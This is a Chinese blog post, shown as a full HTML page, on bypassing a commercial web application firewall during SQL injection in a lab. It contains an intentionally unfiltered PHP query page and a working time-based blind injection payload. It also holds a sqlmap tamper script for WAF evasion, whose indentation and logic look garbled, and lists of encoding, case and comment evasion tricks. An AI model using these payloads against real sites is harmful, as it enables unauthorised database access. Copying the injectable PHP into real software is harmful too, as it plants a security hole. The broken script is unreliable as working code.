<!doctype html><html class="not-ready lg:text-base" style=--bg:#faf8f1 lang=zh-cn dir=ltr><link rel=stylesheet href=/css/fancybox.css><head><meta charset=utf-8><meta http-equiv=X-UA-Compatible content="IE=edge"><meta name=viewport content="width=device-width,initial-scale=1,shrink-to-fit=no"><title>渗透测试中的Bypass技巧（四）自动化注入 - 倾旋的博客</title><meta name=theme-color><meta name=description content="0x01 简单测试
列举一下常见的WAF：

安全狗
云锁
护卫神
D盾
360网站卫士
百度云加速
阿里云云盾

环境：

WAF：某锁最新版本3.1.6
系统:windows 2003
WEB服务器：apache2.4.23
Php版本：php5.4.45
Mysql：5.5.53

PHP SQL注入页面代码：
<?php

$link = mysql_connect('127.0.0.1','root','root')or die('Mysql Cannot Connect');

mysql_select_db('qq');
$id = isset($_REQUEST['id'])?$_REQUEST['id']:1;

$sql=&#34;select * from qq where id = &#34;.$id;
echo $sql.'<hr>';
if(!$result = mysql_query($sql)){
    
     exit(mysql_error($link));
}
$data = mysql_fetch_assoc($result);
     
echo 'ID   = '.$data['id'].'<br>';
echo 'NAME = '.$data['name'].'<br>';
     
echo 'AGE  = '.$data['age'].'<br>';

?>
从上方代码可以看到ID并没有做过滤
那我们现在测试一下注入点是否可以注入到数据

  


现在我们开启某锁漏洞防护功能

  

"><meta name=author content="倾旋的博客"><link rel="preload stylesheet" as=style href=https://payloads.online/main.min.css><link rel=preload as=image href=https://payloads.online/theme.png><link rel=preload as=image href=/avatar.jpeg><script defer src=https://payloads.online/highlight.min.js onload=hljs.initHighlightingOnLoad()></script><link rel=icon href=https://payloads.online/favicon.ico><link rel=apple-touch-icon href=https://payloads.online/apple-touch-icon.png><meta name=generator content="Hugo 0.153.5"><meta itemprop=name content="渗透测试中的Bypass技巧（四）自动化注入"><meta itemprop=description content="声明：本文旨在技术研究，请勿用于违法用途，否则后果自负。"><meta itemprop=datePublished content="2017-03-13T00:00:00+00:00"><meta itemprop=dateModified content="2017-03-13T00:00:00+00:00"><meta itemprop=wordCount content="269"><meta property="og:url" content="https://payloads.online/archivers/2017-03-10/2/"><meta property="og:site_name" content="倾旋的博客"><meta property="og:title" content="渗透测试中的Bypass技巧（四）自动化注入"><meta property="og:description" content="声明：本文旨在技术研究，请勿用于违法用途，否则后果自负。"><meta property="og:locale" content="zh_cn"><meta property="og:type" content="article"><meta property="article:section" content="posts"><meta property="article:published_time" content="2017-03-13T00:00:00+00:00"><meta property="article:modified_time" content="2017-03-13T00:00:00+00:00"><meta name=twitter:card content="summary"><meta name=twitter:title content="渗透测试中的Bypass技巧（四）自动化注入"><meta name=twitter:description content="声明：本文旨在技术研究，请勿用于违法用途，否则后果自负。"><link rel=canonical href=https://payloads.online/archivers/2017-03-10/2/></head><body class="bg-(--bg) text-black antialiased duration-200 ease-out [-webkit-tap-highlight-color:transparent] dark:text-white"><header class="mx-auto flex h-[4.5rem] max-w-(--w) px-8 whitespace-nowrap lg:justify-center"><div class="relative z-50 flex items-center ltr:mr-auto rtl:ml-auto"><a class="-translate-y-[1px] text-2xl font-medium" href=https://payloads.online/>倾旋的博客</a><div class="btn-dark text-[0px] ltr:ml-4 rtl:mr-4 h-6 w-6 shrink-0 cursor-pointer [background:url(./theme.png)_left_center/_auto_theme('spacing.6')_no-repeat] [transition:_background-position_0.4s_steps(5)] dark:[background-position:right]" role=button aria-label=Dark></div></div><div class="btn-menu relative z-50 flex h-[4.5rem] w-[5rem] shrink-0 cursor-pointer flex-col items-center justify-center gap-2.5 lg:hidden ltr:-mr-8 rtl:-ml-8" role=button aria-label=Menu></div><script>const htmlClass=document.documentElement.classList;setTimeout(()=>{htmlClass.remove("not-ready")},10);const btnMenu=document.querySelector(".btn-menu");btnMenu.addEventListener("click",()=>{htmlClass.toggle("open")});const metaTheme=document.querySelector('meta[name="theme-color"]'),lightBg="#faf8f1".replace(/"/g,""),setDark=e=>{metaTheme.setAttribute("content",e?"#000":lightBg),htmlClass[e?"add":"remove"]("dark"),localStorage.setItem("dark",e)},darkScheme=window.matchMedia("(prefers-color-scheme: dark)");if(htmlClass.contains("dark"))setDark(!0);else{const e=localStorage.getItem("dark");setDark(e?e==="true":darkScheme.matches)}darkScheme.addEventListener("change",e=>{setDark(e.matches)});const btnDark=document.querySelector(".btn-dark");btnDark.addEventListener("click",()=>{setDark(localStorage.getItem("dark")!=="true")})</script><div class="nav-wrapper fixed inset-x-0 top-full z-40 flex h-full flex-col justify-center bg-(--bg) pb-16 duration-200 select-none lg:static lg:h-auto lg:flex-row lg:bg-transparent! lg:pb-0 lg:transition-none"><nav class="lg:ml-12 lg:flex lg:flex-row lg:items-center lg:space-x-10 rtl:space-x-reverse"><a class="block text-center text-xl leading-[5rem] lg:text-base lg:font-normal" href=/>首页</a><a class="block text-center text-xl leading-[5rem] lg:text-base lg:font-normal" href=/posts/>文章列表</a><a class="block text-center text-xl leading-[5rem] lg:text-base lg:font-normal" href=/tags>标签</a><a class="block text-center text-xl leading-[5rem] lg:text-base lg:font-normal" href=/projects>开源项目</a><a class="block text-center text-xl leading-[5rem] lg:text-base lg:font-normal" href=/about>关于我</a><a class="block text-center text-xl leading-[5rem] lg:text-base lg:font-normal" href=/links/>友情链接</a><a class="block text-center text-xl leading-[5rem] lg:text-base lg:font-normal" href=/message>留言</a><a class="block text-center text-xl leading-[5rem] lg:text-base lg:font-normal" href=/sponsor>赞助</a></nav></div></header><main class="prose prose-neutral dark:prose-invert relative mx-auto min-h-[calc(100vh-9rem)] max-w-(--w) px-8 pt-14 pb-16"><article><header class=mb-14><h1 class="my-0! pb-2.5">渗透测试中的Bypass技巧（四）自动化注入</h1><div class="text-xs antialiased opacity-60"><time>Mar 13, 2017</time><span class=mx-1>&#183;</span>
<span>倾旋</span></div></header><section><h2 id=0x01-简单测试>0x01 简单测试</h2><p>列举一下常见的WAF：</p><ul><li>安全狗</li><li>云锁</li><li>护卫神</li><li>D盾</li><li>360网站卫士</li><li>百度云加速</li><li>阿里云云盾</li></ul><p>环境：</p><ul><li>WAF：某锁最新版本3.1.6</li><li>系统:windows 2003</li><li>WEB服务器：apache2.4.23</li><li>Php版本：php5.4.45</li><li>Mysql：5.5.53</li></ul><p>PHP SQL注入页面代码：</p><div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-php data-lang=php><span style=display:flex><span><span style=color:#f92672>&lt;?</span><span style=color:#a6e22e>php</span>
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>$link <span style=color:#f92672>=</span> <span style=color:#a6e22e>mysql_connect</span>(<span style=color:#e6db74>&#39;127.0.0.1&#39;</span>,<span style=color:#e6db74>&#39;root&#39;</span>,<span style=color:#e6db74>&#39;root&#39;</span>)<span style=color:#66d9ef>or</span> <span style=color:#66d9ef>die</span>(<span style=color:#e6db74>&#39;Mysql Cannot Connect&#39;</span>);
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span><span style=color:#a6e22e>mysql_select_db</span>(<span style=color:#e6db74>&#39;qq&#39;</span>);
</span></span><span style=display:flex><span>$id <span style=color:#f92672>=</span> <span style=color:#a6e22e>isset</span>($_REQUEST[<span style=color:#e6db74>&#39;id&#39;</span>])<span style=color:#f92672>?</span>$_REQUEST[<span style=color:#e6db74>&#39;id&#39;</span>]<span style=color:#f92672>:</span><span style=color:#ae81ff>1</span>;
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>$sql<span style=color:#f92672>=</span><span style=color:#e6db74>&#34;select * from qq where id = &#34;</span><span style=color:#f92672>.</span>$id;
</span></span><span style=display:flex><span><span style=color:#66d9ef>echo</span> $sql<span style=color:#f92672>.</span><span style=color:#e6db74>&#39;&lt;hr&gt;&#39;</span>;
</span></span><span style=display:flex><span><span style=color:#66d9ef>if</span>(<span style=color:#f92672>!</span>$result <span style=color:#f92672>=</span> <span style=color:#a6e22e>mysql_query</span>($sql)){
</span></span><span style=display:flex><span>    
</span></span><span style=display:flex><span>     <span style=color:#66d9ef>exit</span>(<span style=color:#a6e22e>mysql_error</span>($link));
</span></span><span style=display:flex><span>}
</span></span><span style=display:flex><span>$data <span style=color:#f92672>=</span> <span style=color:#a6e22e>mysql_fetch_assoc</span>($result);
</span></span><span style=display:flex><span>     
</span></span><span style=display:flex><span><span style=color:#66d9ef>echo</span> <span style=color:#e6db74>&#39;ID   = &#39;</span><span style=color:#f92672>.</span>$data[<span style=color:#e6db74>&#39;id&#39;</span>]<span style=color:#f92672>.</span><span style=color:#e6db74>&#39;&lt;br&gt;&#39;</span>;
</span></span><span style=display:flex><span><span style=color:#66d9ef>echo</span> <span style=color:#e6db74>&#39;NAME = &#39;</span><span style=color:#f92672>.</span>$data[<span style=color:#e6db74>&#39;name&#39;</span>]<span style=color:#f92672>.</span><span style=color:#e6db74>&#39;&lt;br&gt;&#39;</span>;
</span></span><span style=display:flex><span>     
</span></span><span style=display:flex><span><span style=color:#66d9ef>echo</span> <span style=color:#e6db74>&#39;AGE  = &#39;</span><span style=color:#f92672>.</span>$data[<span style=color:#e6db74>&#39;age&#39;</span>]<span style=color:#f92672>.</span><span style=color:#e6db74>&#39;&lt;br&gt;&#39;</span>;
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span><span style=color:#75715e>?&gt;</span><span style=color:#960050;background-color:#1e0010>
</span></span></span></code></pre></div><p>从上方代码可以看到ID并没有做过滤</p><p>那我们现在测试一下注入点是否可以注入到数据</p><p><a href=https://images.payloads.online/d9ee0afa-4f5e-11ec-8b7b-00d861bf4abb.jpg data-fancybox=gallery data-caption="enter description here"><img src=https://images.payloads.online/d9ee0afa-4f5e-11ec-8b7b-00d861bf4abb.jpg alt="enter description here"></a></p><p>现在我们开启某锁漏洞防护功能</p><p><a href=https://images.payloads.online/da30f6d0-4f5e-11ec-9bd7-00d861bf4abb.jpg data-fancybox=gallery data-caption="enter description here"><img src=https://images.payloads.online/da30f6d0-4f5e-11ec-9bd7-00d861bf4abb.jpg alt="enter description here"></a></p><p>下面我们开始研究bypass的方法</p><p>我们会根据以下几个知识点</p><ul><li>等价替换</li><li>大小写替换</li><li>不常用条件</li><li>特殊符号</li><li>编码</li><li>注释</li></ul><p><a href=https://images.payloads.online/da722308-4f5e-11ec-9df6-00d861bf4abb.jpg data-fancybox=gallery data-caption="enter description here"><img src=https://images.payloads.online/da722308-4f5e-11ec-9df6-00d861bf4abb.jpg alt="enter description here"></a></p><p>从上面图片数据可看到 某锁防护已经拦截了我这条语句</p><p>我们先测试简单的布尔值运算</p><ul><li>And 1=1 被拦截</li><li>and &lsquo;1&rsquo;=&lsquo;1&rsquo; 被拦截</li><li>and &ldquo;1&rdquo;=&ldquo;1&rdquo; 被拦截</li><li>and &lsquo;1&rsquo;=1 被拦截</li><li>and &lsquo;1&rsquo; 不拦截</li></ul><p>意味着 某锁检测到有=符号 才给拦截的 如何绕过呢</p><p>这里我们要涉及到一个知识点</p><p>等价替换符号:</p><p>&lt; > 等价于 BETWEEN</p><p>= 等价于 like</p><p>据我所知只有那么多 还有知道的多多提供</p><p>那我们可以把“=”替换成 like</p><p><a href=https://images.payloads.online/dabad24c-4f5e-11ec-939b-00d861bf4abb.jpg data-fancybox=gallery data-caption="enter description here"><img src=https://images.payloads.online/dabad24c-4f5e-11ec-939b-00d861bf4abb.jpg alt="enter description here"></a></p><p>从上图可看到简单布尔值运算完全绕过某锁了</p><p>那我们继续获取数据吧</p><h2 id=0x02-继续深入>0x02 继续深入</h2><p>尝试了 联合查询注入 报错注入试了一遍还是不行</p><p>倾旋曾挖掘过一个x全狗的盲注</p><p>这时倾旋提出试试盲注呗</p><p>二话不说 上去就是干盲注</p><p><a href=https://images.payloads.online/db088a6e-4f5e-11ec-b790-00d861bf4abb.jpg data-fancybox=gallery data-caption="enter description here"><img src=https://images.payloads.online/db088a6e-4f5e-11ec-b790-00d861bf4abb.jpg alt="enter description here"></a></p><p>id=1 and &lsquo;1&rsquo; like IF(1 LiKe 1,1,2)</p><p>上方信息可看出使用了大小写替换而且通过if做了一次判断</p><p>If()函数：if(条件,如果真返回的值,如果假返回的值)</p><p>那我们继续往下</p><p>这时我们要讲一下等价函数</p><p>Hex() bin() 等价于 ascii()</p><p>Sleep() 等价于 benchmark()</p><p>Mid()substring() 等价于 substr()</p><p>@@user 等价于 User()</p><p>@@Version 等价于 version()</p><p>根据这些函数我们先来获取mysql root 用户的第一个首字母吧</p><p>基于时间的盲注测试</p><p>我的mysql是默认账号密码也就是第一个首字母是r</p><p>我们查一查r的ASCII码为114</p><p><a href=https://images.payloads.online/db5c8de4-4f5e-11ec-8cee-00d861bf4abb.jpg data-fancybox=gallery data-caption="enter description here"><img src=https://images.payloads.online/db5c8de4-4f5e-11ec-8cee-00d861bf4abb.jpg alt="enter description here"></a></p><p>现在我们构造语句：</p><pre tabindex=0><code>
And &#39;1&#39; like IF(ascii(substr(user(),1,1)) LiKe 113,1,sleep(5))
</code></pre><p>这段语句简单解释下，大牛直接跳过。</p><p>Substr()截取user()用户名第一位 为r</p><p>Ascii(‘r’) 将r 转换成ascii码</p><p>If()判断114 Like(=) 113 如果等于值为1如果不等于Sleep(延时)5秒</p><p><a href=https://images.payloads.online/dbaa6e9c-4f5e-11ec-8fbc-00d861bf4abb.jpg data-fancybox=gallery data-caption="enter description here"><img src=https://images.payloads.online/dbaa6e9c-4f5e-11ec-8fbc-00d861bf4abb.jpg alt="enter description here"></a></p><p>可看到数据没有查出来 页面延时了5秒才加载出来</p><p>最后答案 114不等于113</p><p>剩下盲注出你想要的数据就要慢慢去测试了</p><p>最终Payload:</p><pre tabindex=0><code>and &#39;1&#39; like if(ascii(substr(user(),1,1)) like 113,1,sleep(5))
</code></pre><p>能遇到某锁不拦截这些函数感觉也挺奇怪的</p><p>下面讲一下如果拦截我们应该使用什么方法绕过呢</p><p>这里只提供知识点没有实战</p><h2 id=0x03-自动化bypass扩展>0x03 自动化Bypass（扩展）</h2><p>这里扩充一下编写tamper bypass脚本</p><p>先直接使用SQLmap进行测试（毋庸置疑，肯定失败）：</p><p><a href=https://images.payloads.online/dbf66720-4f5e-11ec-bdc6-00d861bf4abb.jpg data-fancybox=gallery data-caption="enter description here"><img src=https://images.payloads.online/dbf66720-4f5e-11ec-bdc6-00d861bf4abb.jpg alt="enter description here"></a></p><p>在经过大量测试以后，我们定位特征，写出了bypass脚本：</p><div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-python data-lang=python><span style=display:flex><span><span style=color:#75715e>#!/usr/bin/env python</span>
</span></span><span style=display:flex><span><span style=color:#f92672>import</span> re
</span></span><span style=display:flex><span><span style=color:#f92672>from</span> lib.core.enums <span style=color:#f92672>import</span> PRIORITY
</span></span><span style=display:flex><span>__priority__ <span style=color:#f92672>=</span> PRIORITY<span style=color:#f92672>.</span>LOW
</span></span><span style=display:flex><span><span style=color:#66d9ef>def</span> <span style=color:#a6e22e>tamper</span>(payload):
</span></span><span style=display:flex><span>    <span style=color:#66d9ef>if</span> payload:
</span></span><span style=display:flex><span>              <span style=color:#66d9ef>pass</span>
</span></span><span style=display:flex><span>              payload <span style=color:#f92672>=</span>
</span></span><span style=display:flex><span>payload<span style=color:#f92672>.</span>replace(<span style=color:#e6db74>&#34;SLEEP(5)&#34;</span>,<span style=color:#e6db74>&#34;</span><span style=color:#ae81ff>\&#34;</span><span style=color:#e6db74>0</span><span style=color:#ae81ff>\&#34;</span><span style=color:#e6db74> LikE Sleep(5)&#34;</span>)
</span></span><span style=display:flex><span>       payload<span style=color:#f92672>=</span>payload<span style=color:#f92672>.</span>replace(<span style=color:#e6db74>&#34;&#34;</span>,<span style=color:#e6db74>&#34;/*FFFFFFFFFFFFFFFFFFFFFFFFF*/&#34;</span>)
</span></span><span style=display:flex><span>              p <span style=color:#f92672>=</span> re<span style=color:#f92672>.</span>compile(<span style=color:#e6db74>r</span><span style=color:#e6db74>&#39;(\d+)=&#39;</span>)
</span></span><span style=display:flex><span>              payload<span style=color:#f92672>=</span> p<span style=color:#f92672>.</span>sub(<span style=color:#e6db74>r</span><span style=color:#e6db74>&#34;&#39;\1&#39;LikE &#34;</span>, payload)
</span></span><span style=display:flex><span><span style=color:#66d9ef>return</span> payload
</span></span></code></pre></div><p>测试结果：</p><p><a href=https://images.payloads.online/dc39a562-4f5e-11ec-bb41-00d861bf4abb.jpg data-fancybox=gallery data-caption="enter description here"><img src=https://images.payloads.online/dc39a562-4f5e-11ec-bb41-00d861bf4abb.jpg alt="enter description here"></a></p><h2 id=0x04-小总结>0x04 小总结</h2><p>等价替换</p><p>前面已经讲解了 等价函数和等价符号</p><p>大小写替换 想必这个大家应该都知道 把字母的大写小写替换下就行了例如 SeLeCt LiKe UnIoN</p><p>不常用函数
一般经常在报错注入中使用</p><p>例如floor(),extractvalue(),updatexml(),exp() 这些 原因是因为waf 可能没考虑到这些函数的危害</p><p>特殊符号</p><p>例如 <code>“+”,“-”,“@”,“！”,“~”</code>等等很多的特殊符号</p><p>比如 “+” select+password+from+mysql.user 相当于是一个空格的作用</p><p>编码
URL编码</p><p>普通的URL编码就不再过多叙述，但是在有些数据传输过程中可以采用双重URL编码测试</p><p>Unicode编码</p><p>个别特殊符号：</p><p>单引号：</p><p>%u0027、%u02b9、%u02bc%u02c8、%u2032、%uff07、%c0%27、%c0%a7、%e0%80%a7
空格：</p><p>%u0020、%uff00、%c0%20、%c0%a0、%e0%80%a0</p><p>左括号：</p><p>%u0028、%uff08、%c0%28、%c0%a8、%e0%80%a8</p><p>右括号：</p><p>%u0029、%uff09、%c0%29、%c0%a9、%e0%80%a9</p><p>十六进制编码</p><p>在有的情况下通过注入点写shell的时候，我们一般把shell code转换为十六进制，其一因为数据库自动转换，其二是因为可以逃避WAF针对特殊字符拦截。</p><p>注释</p><p>某些情况下，针对不同的数据库采用不同的注释混淆，也可以bypass</p><p>普通注释 <code>/**/、-- 、# ...</code></p><p>内联注释 <code>/*!*/</code></p></section><nav class="mt-24 flex overflow-hidden rounded-xl bg-black/[3%] text-lg leading-[1.2]! *:flex *:w-1/2 *:items-center *:p-5 *:font-medium *:no-underline dark:bg-white/[8%] [&>*:hover]:bg-black/[2%] dark:[&>*:hover]:bg-white/[3%]"><a class="ltr:pr-3 rtl:pl-3" href=https://payloads.online/archivers/2017-03-05/1/><span class="ltr:mr-1.5 rtl:ml-1.5">←</span><span>phpMyAdmin新姿势getshell</span></a><a class="justify-end pl-3 ltr:ml-auto rtl:mr-auto" href=https://payloads.online/archivers/2017-03-10/1/><span>渗透测试中的Bypass技巧（三）自动化注入</span><span class="ltr:ml-1.5 rtl:mr-1.5">→</span></a></nav><div class="giscus mt-24"></div><script src=https://giscus.app/client.js data-repo=Rvn0xsy/rvn0xsy.github.io data-repo-id="MDEwOlJlcG9zaXRvcnk0MDEyMzI3MTY=" data-category=General data-category-id=DIC_kwDOF-pTTM4CRDk_ data-mapping=title data-strict=1 data-reactions-enabled=0 data-emit-metadata=0 data-input-position=top data-theme=light data-lang=zh-CN data-loading=lazy crossorigin=anonymous async></script></article></main><script src=/js/fancybox.umd.js></script><script>Fancybox.bind('[data-fancybox="gallery"]',{})</script><script src=/js/pangu.min.js></script><script>document.addEventListener("DOMContentLoaded",()=>{pangu.spacingElementByClassName("prose")})</script><footer class="mx-auto flex h-[4.5rem] max-w-(--w) items-center px-8 text-xs tracking-wider uppercase opacity-60"><div class=mr-auto>倾旋 All rights reserved</div><a class="link mx-6" href=https://gohugo.io/ rel=noopener target=_blank>powered by hugo️️</a>️</footer></body></html>